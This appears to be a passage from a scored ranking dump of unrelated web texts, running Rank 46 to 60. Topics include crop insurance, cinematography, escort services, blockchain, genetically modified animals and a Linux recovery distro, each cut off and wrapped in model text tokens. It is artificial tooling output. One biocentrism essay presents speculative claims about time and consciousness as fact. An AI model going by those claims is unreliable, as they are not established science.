makes predictions about how things will look. The surprising +================================================================================ +Rank = 46; Score = 4325376.0 +<|begin_of_text|>Crop insurance is purchased by agricultural producers, and subsidized by the federal government, to protect against either the loss of their crops due to natural disasters, such as hail, drought, and floods, or the loss of revenue due to declines in the prices of agricultural commodities. The two general categories of crop insurance are called crop-yield insurance and crop-revenue insurance. On average, the federal government subsidizes 62 percent of the premium. In 2014, crop insurance policies covered 294 million acres. Major crops are insurable in most counties where they are grown, and approximately 83% of U.S. crop acreage is insured under the federal crop insurance program. Four crops—corn, cotton, soybeans, and wheat— typically account for more than 70% of total enrolled acres. For these major crops, a large share of plantings is covered by crop insurance. In 2014, the portion of total corn acreage covered by federal crop insurance was 87%; cotton, 96%; soybeans, 88%; and wheat, 84%. + +Specialty crops [ edit ] + +A farmer or grower may desire to grow a crop associated with a particular defined attribute that potentially qualifies for a premium over similar commodity crops, agricultural products, or derivatives thereof. The particular attribute may be associated with the genetic composition of the crop, certain management practices of the grower, or both. However, many standard crop insurance policies do not differentiate between commodity crops and crops associated with particular attributes. Accordingly, farmers have a need for crop insurance to cover the risk of growing crops associated with particular attributes.[1] + +United States [ edit ] + +In the United States, a subsidized multi-peril federal insurance program, administered by the Risk Management Agency, is available to most farmers. The program is authorized by the Federal Crop Insurance Act (which is actually title V of the Agricultural Adjustment Act of 1938, P.L. 75-430), as amended. Federal crop insurance is available for more than 100 different crops, although not all insurable crops are covered in every county. With the amendments to the Federal Crop Insurance Act made by the Federal Crop Insurance Reform Act of 1994 (P.L. 103-354, Title I) and the Agriculture Risk Protection Act of 2000 (P.L. 106-224), USDA is authorized to offer basically free catastrophic (CAT) coverage to producers who grow an insurable crop. For a premium, farmers can buy additional coverage beyond the CAT level. Crops for which insurance +================================================================================ +Rank = 47; Score = 4292608.0 +<|begin_of_text|>A cinematographer is also known as a director of photography. They’re the guys that make the movies we watch look how they look. It’s their photographic eye that we see. And they don’t get too much recognition for the work they do, with most of the attention going towards the director and actor already. I wanted to write about a few good ones and see if it can become a weekly thing if you guys are into it. You probably know the work these guys have done, so I’ll cover what they did to get the shots that we see on the big screen. + +If this is going to be the first out of more to come, I’ll start it off with a bang by focusing it on Roger Deakins. + +Roger Deakins + +You’d probably have called him a purist; Roger Deakins’ preferred medium was film, until around 2011, when he stepped into the digital world when the Alexa cameras caught his eye. + +“I prefer Super 35 because it allows you to use short focal-length lenses. I also like the scale of that format — the intimacy — and the texture of the film grain. In some cases I find anamorphic to be almost too clean, too grain-free and pristine.” (AC Magazine, October 2007) + +Regardless of what he uses, he uses it to its fullest potential. If you’ve seen The Shawnshank Redemption, No Country for Old Men, The Assassination of Jesse James, Skyfall or even How to Train Your Dragon, you’ve seen his work. The guy’s got a resume, and it’s a wonder that none of his work has placed him an oscar yet. Here’s how a few of his most iconic shots were done: + +The Assassination of Jesse James by the Coward Robert Ford + +The Assassination of Jesse James opens with a train robbery. This scene was being filmed entirely at night, in a town called Edmonton. The train they had was supposedly a bit small (the director started calling it Thomas the Tank Engine), and they didn’t have the budget to bring a bigger train. Deakins assured the crew that with the right camera work, it wouldn’t be a big deal at all. After attempting to calm the crew down, Deakins gave the set another scare with his approach to how he’d film the scene: with just one source of light coming from a lamp set on the train. + +Considering this was being done with a night shot, everyone was rightfully pretty uneasy; what resulted, however, was possibly +================================================================================ +Rank = 48; Score = 4194304.0 +<|begin_of_text|>Internet pornography is any pornography that is accessible over the Internet, primarily via websites, peer-to-peer file sharing, or Usenet newsgroups. The availability of widespread public access to the World Wide Web in late 1990s led to the growth of Internet pornography. + +A 2015 study finds "a big jump"[1] in pornography viewing over the past few decades, with the largest increase occurring between people born in the 1970s and those born in the 1980s. While the study's authors note this increase is "smaller than conventional wisdom might predict," it's still quite significant. Children born in the 1980s onward are also the first to grow up in a world where they have access to the Internet beginning in their teenage years, and this early exposure and access to Internet pornography may be the primary driver of the increase.[1] The sex and tech conference series Arse Elektronika dedicated their 2007 conference to what they call pr0nnovation. The con presented a keynote by culture theorist Mark Dery and published a reader about the subject. + +As of 2018, a single company, MindGeek, owns and operates many popular[2] pornographic websites, including video sharing services Pornhub, RedTube, and YouPorn, as well as adult film producers Brazzers, Digital Playground, Men.com, Reality Kings, and Sean Cody, among others.[3] It has been alleged to be a monopoly.[3] + +History and methods of distribution + +Before the World Wide Web + +Pornography is regarded by some as one of the driving forces behind the expansion of the World Wide Web, like the camcorder VCR and cable television before it.[4] Pornographic images had been transmitted over the Internet as ASCII porn but to send images over network needed computers with graphics capability and also higher network bandwidth. This was possible in the late 1980s and early 1990s through the use of anonymous FTP servers and through the Gopher protocol. At this time the internet was mainly an academic and military network and there was not widespread use of the internet. One of the early Gopher/FTP sites was at tudelft and was called the Digital Archive on the 17th Floor (List of websites founded before 1995). This small image archive contained some low quality scanned pornographic images that were initially available to anyone anonymously, but the site soon became restricted to Netherlands only access. + +Usenet groups + +Usenet newsgroups provided an early way of sharing +================================================================================ +Rank = 49; Score = 4096000.0 +<|begin_of_text|>Researchers at the University of Liverpool have developed a set of algorithms that will help teach computers to process and understand human languages. + +Whilst mastering natural language is easy for humans, it is something that computers have not yet been able to achieve. Humans understand language through a variety of ways for example this might be through looking up it in a dictionary, or by associating it with words in the same sentence in a meaningful way. + +The algorithms will enable a computer to act in much the same way as a human would when encountered with an unknown word. When the computer encounters a word it doesn’t recognise or understand, the algorithms mean it will look up the word in a dictionary (such as the WordNet), and tries to guess what other words should appear with this unknown word in the text. + +Semantic representation + +It gives the computer a semantic representation for a word that is both consistent with the dictionary as well as with the context in which it appears in the text. In order to know whether the algorithm has provided the computer with an accurate representation of a word it compares similarity scores produced using the word representations learnt by the computer algorithm against human rated similarities. + +Liverpool computer scientist, Dr Danushka Bollegala, said: “Learning accurate word representations is the first step towards teaching languages to computers.” + +“If we can represent the meaning for a word in a way a computer could understand, then the computer will be able to read texts on behalf of humans and perform potentially useful tasks such as translating a text written in a foreign language, summarising a lengthy article, or find similar other documents from the Internet. + +“We are excitingly waiting to see the immense possibilities that will be brought about when such accurate semantic representations are used in various language processing tasks by the computers.” + +The research was presented at the Association for Advancement of Artificial Intelligence Conference (AAAI-2016) held in Arizona, USA.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 50; Score = 3964928.0 +<|begin_of_text|>The business of male escort services in India is often complex and dangerous. + +Last week, the police in New Delhi uncovered a racket after rescuing an aspiring escort who was kidnapped by a fake agency and held for ransom in Hapur in the northern state of Uttar Pradesh. The 26-year-old was allegedly lured by the promise of earning between Rs15,000 and Rs25,000 a day, much more than what he made as a salesman selling mobile phones at a store in the national capital. + +The incident comes in the wake of the rapid proliferation of escort services across India, taking advantage of the internet, social media networks, and technology like WhatsApp to make transactions quick and smooth. Over the years, both male and female escort services have become well-versed in techniques such as Search Engine Optimisation (SEO) to make sure their websites are easily visible to those seeking company or a little more online. And these methods have paid off: one anonymous escort agency owner told The Times of India that the industry has a daily turnover of around Rs10 crore in Mumbai and Rs50 crore in New Delhi. + +For some young Indians, among them struggling actors or models, signing up as an escort is a way to make some serious money, anywhere between Rs20,000 to Rs40,000 a day, by one estimate. And while many escort agencies advertise their services in PG terms like “friendship,” there’s a whole range of options available, including the “girlfriend experience” that blends transactional sex with the intimacy of a relationship, albeit one that is paid for. + +But as the Hapur kidnapping shows, the shadowy workings of the industry have left a lot of escorts and aspiring escorts vulnerable. In July, India banned 240 escort websites in a bid to stem the spread of these services but the move was widely criticised as ineffective. After all, many of the websites could simply switch to a new domain and resume business as usual. + +So far, India’s laws have mainly concerned themselves with prostitution and human trafficking, with a focus on women and children, but there’s still a lack of comprehensive regulation. Under the Immoral Traffic Prevention Act of 1956, it’s soliciting sex that’s a crime, besides running a brothel or forcing individuals to engage in prostitution. So technically, prostitution itself isn’t illegal. But in reality, the laws are interpreted in line with the society’s moral code that stigmatises sex workers and keeps them working in the shadows, vulnerable to exploitation. + +The situation is more complicated when it comes to +================================================================================ +Rank = 51; Score = 3932160.0 +<|begin_of_text|>Nobody wants a laptop computer that stops working when a cloud passes by. Storing sunlight as fuel that can be later used to drive fuel cells requires new materials. Scientists demonstrated such a material. They combined two oxides on the atomic scale. The interface between the oxide materials, one containing strontium and titanium and one containing lanthanum and chromium, absorbs visible light, producing electrons and holes that might be useful for catalyzing reactions, such as producing hydrogen fuel. However, if there is nothing to pull those electrons and holes apart, they will quickly annihilate one another without doing anything useful. By carefully synthesizing this material as a series of alternating layers, the international team created a built-in electric field that could help separate the excited electrons and holes and improve the material's performance as a catalyst. + +This material opens up new scientific frontiers to solve a persistent energy challenge: storing solar energy for later use. Fuel cells capable of running on hydrogen fuel created by solar energy could allow people to heat their homes and run their computers on solar energy even in the dark of night. + +By depositing thin layers of SrTiO 3 and LaCrO 3 on a crystalline substrate, the investigators at the Pacific Northwest National Laboratory, Argonne National Laboratory, SuperSTEM, and the University of Oxford controlled how the ions at the interfaces bond to each other. This allowed them to engineer an electric field in the material that can be used to separate electrons and holes. Using X-ray spectroscopy techniques, they confirmed that the electric field was present and that the ions in the material shift positions as a result. Ultra-high resolution measurements using an electron microscope helped confirm this ionic shift. + +All of these experimental results were backed up by computational modeling of the materials, which predicted behavior in excellent agreement with what was observed. + +The electric field in these materials is present because the researchers were able to precisely control the growth process so that each interface has either a positive or negative charge. Alternating positively and negatively charged interfaces in the material produce nanoscale electric fields that can interact with the electrons and holes that are excited by solar energy. Electrons may then be driven to the surface, where they could interact with water molecules to break their bonds and produce hydrogen fuel. + +Researchers are continuing to explore the properties of these superlattices using cutting-edge X-ray measurements at synchrotrons around the world and using other advanced microscopy techniques to look at the chemical makeup of the interfaces.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 52; Score = 3932160.0 +<|begin_of_text|>Email Address + +First Name + +Last Name + +Phone Number + +Job Title + +Company + +Terms and Conditions + +This is a legal agreement between you, the end-user (“User”), and PRRI. By downloading the survey data from the PRRI web site (“Data”) you are agreeing to be bound by the terms and conditions of this agreement. If you do not agree to be bound by these terms, do not download or use the Data. + +PRRI hereby grants to the User a non-exclusive, revocable, limited, non-transferable license to use the Data solely for (1) research, scholarly or academic purposes, (2) the internal use of your business, or (3) your own personal non-commercial use. You may not reproduce, sell, rent, lease, loan, distribute, or sublicense or otherwise transfer any Data, in whole or in part, to any other party, or use the Data to create any derived product for resale, lease or license. Notwithstanding the foregoing, you may incorporate limited portions of the Data in scholarly, research, or academic publications or for the purposes of news reporting, provided you acknowledge the source of the Data (with express references to PRRI, as well as the complete title of the report) and include the following legend: + +PRRI bears no responsibility for the analyses or interpretations of the data presented here. + +The Data is provided “as is” without any warranty of any kind, either express or implied, arising by law or otherwise, including but not limited to warranties of completeness, non-infringement, accuracy, merchantability, or fitness for a particular purpose. The User assumes all risk associated with use of the data and agrees that in no event shall the center be liable to you or any third party for any indirect, special, incidental, punitive, or consequential damages including, but not limited to, damages for the inability to use equipment or access data, loss of business, loss of revenue or profits, business interruptions, loss of information or data, or other financial loss, arising out of the use of, or inability to use, the data based on any theory of liability including, but not limited to, breach of contract, breach of warranty, tort (including negligence), or otherwise, even if User has been advised of the possibility of such damages. + +PRRI has taken measures to ensure that the Data is devoid of information that could be used to identify individuals (e.g., names, telephone numbers, email addresses, social security numbers) who participated in or who were the subject of +================================================================================ +Rank = 53; Score = 3915776.0 +<|begin_of_text|>Recently, the operation entity of Baoquan.com——Shuqin Technology Co.,Ltd.(hereinafter referred to as Shuqin) has signed a further strategic partnership agreement with Factom to promote the cross-border interation between both two sides. As early as in 2016, Baoquan.com and Factom have reached a strategic cooperation intention to jointly promote the development of Blockcchian underlying technology. And for this time, both parties will have a deep learning and exploring in application layer of Baoquan.com and the bottom products of Factom, then to further form the co-operation with business interconnection and combination technique. + +Factom also said that Shuqin is the customer who uploading the maximum amount of data on Factom chain except itself. Relying on the technical support of Factom, Shuqin has completed the key projects like China local stock exchange, big data, etc. And cooperated with Qianmai for the judicial identication, which means Blockchain electronic data attestation won the first approval of justice on judicature layer. On the one hand, Factom will apply a more comprehensive identity management and on-chain data feedback service to perfect the underlying technology service. On the other hand, Shuqin will also provide the business practice to support the upgrading of basic technology and the deploying of demestic alliance nodes. + +Factom is an infrastructure service provider for recording, verifying and auditing based on Blockchain, and stores the world’s data on a decentralized system. Using blockchain technology for smart contracts, digital assets and database integrity. The core technology that enables company to interact smoothly with data, improve efficiency, and make better decisions. And Factom software can plug into the existing systems with proven technology that can be deployed quickly and adapt to any domain. The application of Factom has far exceeded the scope of recording and management, and is being ued in copyright, education, taxation, government services and some other fields. + +As for a China local blockchain enterprise, Shuqin is devoting to solve the practical problem by blockchain technology with the core business on the financial service. Baoquan.com as the first product in electronic data attestation, applied the distributed and decentralized characteristics of blockchian technology to provide the one-stop service for enterprises and personal. Big data exchange centre as the core project, using blockchain technology to ensure the authenticity and safety of data sources, and achieve the transparency of chain-trading, then to realize the goal of real-time traceability for the data sources +================================================================================ +Rank = 54; Score = 3883008.0 +<|begin_of_text|>Growth for the sake of growth is the ideology of the cancer cell –-Edward Abbey + +Capitalism can be defined as a system under which industries, trade and the means of production are largely or wholly privately owned and operated for profit. Following the end of feudalism, it dominated the Western world, and thanks to imperialism this domination extended to the global economic system by the end of the 19th century. Entering the 21st century, it continues to reign unchallenged as the world’s pre-eminent economic doctrine. + +The world’s richest person (Bill Gates) has a personal wealth of $78.7 billion. This is higher than the (nominal) GDP of 130 countries, including Uruguay (population 3.4m), Ecuador (population 15.9m), Bulgaria (population 7.2m) and Croatia (population 4.3m). The wealth of the top ten richest people combined is $544 billion — higher than the GDP of 172 of the 194 nations for which UN data is available, including Thailand (population 65m), South Africa (population 54m), Egypt (population 88m), Portugal (population 10.4m) and Czech Republic (population 10.5m). + +Almost half the world’s population, over 3 billion people, live on less than $2.50 a day. According to UNICEF, 22,000 children die EACH DAY due to poverty. They “die quietly in some of the poorest villages on earth, far removed from the scrutiny and the conscience of the world. Being meek and weak in life makes these dying multitudes even more invisible in death.” Nearly a billion people entered the 21st century unable to read a book or sign their names. For every $1 in aid a developing country receives, over $25 is spent on debt repayment. Less than one per cent of what the world spent every year on weapons was needed to put every child into school by the year 2000. [Sources. (Note: site last updated in January 2013. Some data is a few years out of date, meaning it is likely to be worse now as global inequality has widened.)] + +The modern form capitalism has taken is complex, with close relationships and revolving doors between politics and the multinational corporations and banks that act as the main players commonplace. Directors of corporations are under severe pressure to increase profits each quarter, partly to increase the size, market share, wealth and power of the company +================================================================================ +Rank = 55; Score = 3866624.0 +<|begin_of_text|>I created a model that learns how to turn outlines into stylish and colorful icons. Icon and logo design is difficult — expert human designers choose from line weights, colors, textures and shapes to create beautiful icons such as these (I’m a big fan). But there seems to be a pattern to how each designer make their choices. So, I decided it would be interesting to try to train a model that learns a designer’s style, and then takes any freely available icon outlines (e.g. from the Noun Project ), and color and style them exactly as how a designer would have completely automatically. I built this as part of my Stanford CS229 final project. + +I’ve made my code and pre-trained model weights available at https://github.com/mosessoh/iconcolor. + +How I envision this being used is that someone starts a side project, and needs an logo/icon for branding. Let’s say her side project is about sharing beautiful royalty free images (e.g. Unsplash). She grabs an icon she likes (e.g. this camera icon from the IconBros icon pack that went viral on Product Hunt), and submits it to the model, and voila — a fully colored and stylized icon. Note how the model uses some darker shades of orange at the sides to give it some visual depth, and adds a splash of green to really make it pop. + +Why I think this might be useful + +Beautiful icon outlines are easy to find online, relative to colored icons. This can help someone generate an original & unique colored icon for whatever project they need. It might not be as good as Yoga Perdana’s or Ivan Bobrov’s work, but I think it’s much better than using a generic solid icon. + +How it works + +There are more details in the poster below (I made that for CS229), but at a high level, this is modelled as a supervised learning problem. I take in a 1 x 128 x 128 grayscale icon and produce a 3 x 128 x 128 RGB icon which is then compared to a true RGB icon using some loss function during training. The model is a Convolutional Neural Network called a U-Net which I trained on an icon set from Smashicons (I’m a premium subscriber — there isn’t a more complete set of ). I taught the model to convert outlines to yellow style icons, but this model can learn to convert between arbitrary styles since nothing is hard-coded. + +Poster for my CS229 final project + +The top 3 things I learned from my +================================================================================ +Rank = 56; Score = 3833856.0 +<|begin_of_text|>Genetically modified animals are animals that have been genetically modified for a variety of purposes including producing drugs, enhancing yields, increase resistance to disease, etc. The vast majority of genetically modified animals are at the research stage with the number close to entering the market remains small.[1] + +Production [ edit ] + +The process of genetically engineering mammals is a slow, tedious, and expensive process.[2] As with other genetically modified organisms (GMOs), first genetic engineers must isolated the gene they wish to insert into the host organism. This can be taken from a cell containing the gene[3] or artificially synthesised.[4] If the chosen gene or the donor organism's genome has been well studied it may already be accessible from a genetic library. The gene is then combined with other genetic elements, including a promoter and terminator region and usually a selectable marker.[5] + +A number of techniques are available for inserting the isolated gene into the host genome. With animals DNA is generally inserted into using microinjection, where it can be injected through the cell's nuclear envelope directly into the nucleus, or through the use of viral vectors.[6] The first transgenic animals were produced by injecting viral DNA into embryos and then implanting the embryos in females.[7] It is necessary to ensure that the inserted DNA is present in the embryonic stem cells.[8] The embryo would develop and it would be hoped that some of the genetic material would be incorporated into the reproductive cells. Then researchers would have to wait until the animal reached breeding age and then offspring would be screened for presence of the gene in every cell, using PCR, Southern hybridization, and DNA sequencing.[9] + +New technologies are making genetic modifications easier and more precise.[2] Gene targeting techniques, which creates double-stranded breaks and takes advantage on the cells natural homologous recombination repair systems, have been developed to target insertion to exact locations. Genome editing uses artificially engineered nucleases that create breaks at specific points. There are four families of engineered nucleases: meganucleases,[10][11] zinc finger nucleases,[12][13] transcription activator-like effector nucleases (TALENs),[14][15] and the Cas9-guideRNA system (adapted from CRISPR).[16][17] TALEN and CRISPR are the two most commonly used and each has its own advantages.[18] TALENs have greater target specificity, while CRISPR is easier to design and more efficient.[18] The development of the CRISPR-C +================================================================================ +Rank = 57; Score = 3817472.0 +<|begin_of_text|>Researchers at North Carolina State University have developed techniques that can be used to create ideal geometric phase holograms for any kind of optical pattern -- a significant advance over the limitations of previous techniques. The holograms can be used to create new types of displays, imaging systems, telecommunications technology and astronomical instruments. + +A geometric phase hologram is a thin film that manipulates light. Light moves as a wave, with peaks and troughs. When the light passes through a geometric phase hologram, the relationship between those peaks and troughs is changed. By controlling those changes, the hologram can focus, disperse, reorient or otherwise modify the light. + +An ideal geometric phase hologram modifies the light very efficiently, meaning that little of the light is wasted. But ideal geometric phase holograms can also produce three different, well-defined "wavefronts" -- or transformed versions of the light that passes through the thin film. + +"We can direct light into any one or more of those three wavefronts, which allows us to use a single ideal geometric phase hologram in many different ways," says Michael Escuti, a professor of electrical and computer engineering at NC State and corresponding author of a paper on the work. + +Previously, researchers were only able to make ideal geometric phase holograms in a limited set of simple patterns, curtailing their usefulness for new applications. This is because making these holograms involves orienting molecules or structures at a scale smaller than the wavelength of light. + +"We've come up with two ways of making ideal geometric phase holograms that are relatively simple but allow us to control the orientation of the molecules that ultimately manipulate the light," Escuti says. + +First, the researchers use lasers to create a high-fidelity light pattern, either by taking advantage of how waves of light interfere with each other, or by using a tightly focused laser to scan through a pattern -- much like a laser printer. + +A photoreactive substrate records the light pattern, with each molecule in the substrate orienting itself depending on the polarization of the light it was exposed to. To understand this, think of a beam of light as a wavy string, traveling from left to right. That string is also vibrating up and down -- creating wiggles are that are perpendicular to the direction the string is traveling. Controlling the orientation angle of the light's linear polarization just means controlling the direction that the wave is wiggling. + +The pattern that is recorded on the substrate then serves as a template for a liquid crystal layer that forms the finished hologram. + +"Using these techniques, +================================================================================ +Rank = 58; Score = 3751936.0 +<|begin_of_text|>Definition from: All About Philosophy - Existentialism Existentialism is a 20th century termed philosophy concerned with human existence, finding self, and the meaning of life through free will, choice, and personal responsibility. The belief is that people are searching to find out who and what they are throughout life as they make choices based on their experiences, beliefs, and outlook. And personal choices become unique without the necessity of an objective form of truth. An existentialist believes that a person should be forced to choose and be responsible without the help of laws, ethnic rules, or traditions.Listed below are a number of existentially-themed films which I feel address the human condition in a profound, and ultimately, rewarding way. Gaining insight into ourselves and being able to express this with others through these films.In reverse chronological order and purely subjective.<|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|><|end_of_text|> +================================================================================ +Rank = 59; Score = 3751936.0 +<|begin_of_text|>We think our destiny is to journey to Mars and beyond. Yet as we build our spacecraft, we're about to be broadsided - from a different direction - by the most explosive event in history. + +Sometime in the future science will be able to create realities that we can't even begin to imagine. As we evolve, we'll be able to construct other information systems that correspond to other realities, universes based on logic completely different from ours and not based on space and time. + +Immanuel Kant declared in 1781 that space and time were real, but only indeed as properties of the mind. These algorithms are not only the key to consciousness, but why space and time − indeed the properties of matter itself - are relative to the observer. But a new theory called biocentrism suggests that space and time may not be the only tools that can be used to construct reality. At present, our destiny is to live and die in the everyday world of up and down. But what if, for example, we changed the algorithms so that instead of time being linear, it was 3-dimensional like space? Consciousness would move through the multiverse. We'd be able to walk through time just like we walk through space. And after creeping along for 4 billion years, life would finally figure out how to escape from its corporeal cage. Our destiny would lie in realities that exist outside of the known physical universe. + +Even science fiction is struggling with the implications. In "Avatar," human consciousness is infused into blue aliens that inhabit a wondrous world. However, according to biocentrism, replicating human intelligence or consciousness will require the same kind of algorithms for employing time and space that we enjoy. Everything we experience is a whirl of information occurring in our heads. Time is simply the summation of spatial states - much like the frames in a film - occurring inside the mind. It's just our way of making sense of things. There's also a peculiar intangibility to space. We can't pick it up and bring it to the laboratory. Like time, space isn't an external object. It's part of the mental software that molds information into multidimensional objects. + +We take for granted how our mind puts everything together. When I woke up this morning, I was in the middle of a dream that seemed as real as everyday life. I remember looking out over a crowded port with people in the foreground. Further out, there were ships engaged in battle. And still further out to sea was a battleship with +================================================================================ +Rank = 60; Score = 3735552.0 +<|begin_of_text|>Sometimes bad things happen, and you must recover your desktop or server from an error. + +For this delicate work there are some specialised Linux Live Distributions that once booted allow you to make a lot of tasks, like mounting and repairing disk partitions and file system, for this it’s important that the live Distro has support for many different File System type and LVM, it should also have a good support for the network, it’s possible that you need to download or move something on the computer, and so it’s also important to have a wide range of network support, wi-fi too maybe. + +I’ve know Finnix because it’s the recovery solution choosed by my the hosting company that i use, Linode. + +Finnix is a self-contained, bootable Linux CD distribution (“LiveCD”) for system administrators, based on Debian. You can mount and 